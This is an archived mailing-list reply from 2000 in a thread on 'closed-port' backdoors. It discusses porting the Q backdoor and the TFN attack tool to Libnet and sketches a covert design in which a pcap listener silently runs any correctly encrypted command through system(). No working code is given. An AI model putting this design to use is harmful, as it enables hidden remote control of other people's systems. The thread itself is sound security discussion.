Security Incidents mailing list archives

Re: "closed-port" backdoors

From: M ixter <mixter () 2XS CO IL>
Date: Wed, 23 Feb 2000 20:35:11 +0100

Fernando Cardoso wrote:

Mixter's Q does the job quite nicely. The daemon can be activated via raw
IP. You don't have to send any SYN packets. The drawback is that it only
works on systems that can handle raw IP, so forget about Solaris and some
flavours of BSD. I've tried it on Linux and it works very well.


If I'm not mistaken, Libnet API works pretty much everywhere, and it
wouldn't be a problem porting programs like Q or TFN from plain raw
sockets to Libnet API. Q/Q2 is usable, but more POC than application,
so I didn't make the effort to port it. If there are problems with
Libnet, one could at least use pcap on Solaris or BSD systems for a
passive-listening tool.

Also, there don't have to be obvious effects of a remote "raw" command,
such as opening a local port. The probably simplest application would be
a message-decrypting pcap application, that listens to all protocols and
just executes anything encrypted with the right key, using system()...


Mixter

------------------------------
 2XS Ltd. http://www.2xss.com
      mixter () 2xs co il
 http://mixter.warrior2k.com
  or http://mixter.void.ru
------------------------------

Current thread:

"closed-port" backdoors Andreas Hasenack (Mar 21)
- Virus sig? John R. Sciandra (Mar 22)
- Re: "closed-port" backdoors Alexander Reelsen (Mar 22)
- Re: "closed-port" backdoors Fernando Cardoso (Mar 22)
- Re: "closed-port" backdoors Valdis Kletnieks (Mar 22)
  - Re: "closed-port" backdoors Andreas Hasenack (Mar 22)
- Re: "closed-port" backdoors Joe Boyle (Mar 22)
- <Possible follow-ups>
- Re: "closed-port" backdoors Frank Knobbe (Mar 22)
  - Re: "closed-port" backdoors Andreas Hasenack (Mar 22)
- Re: "closed-port" backdoors M ixter (Mar 23)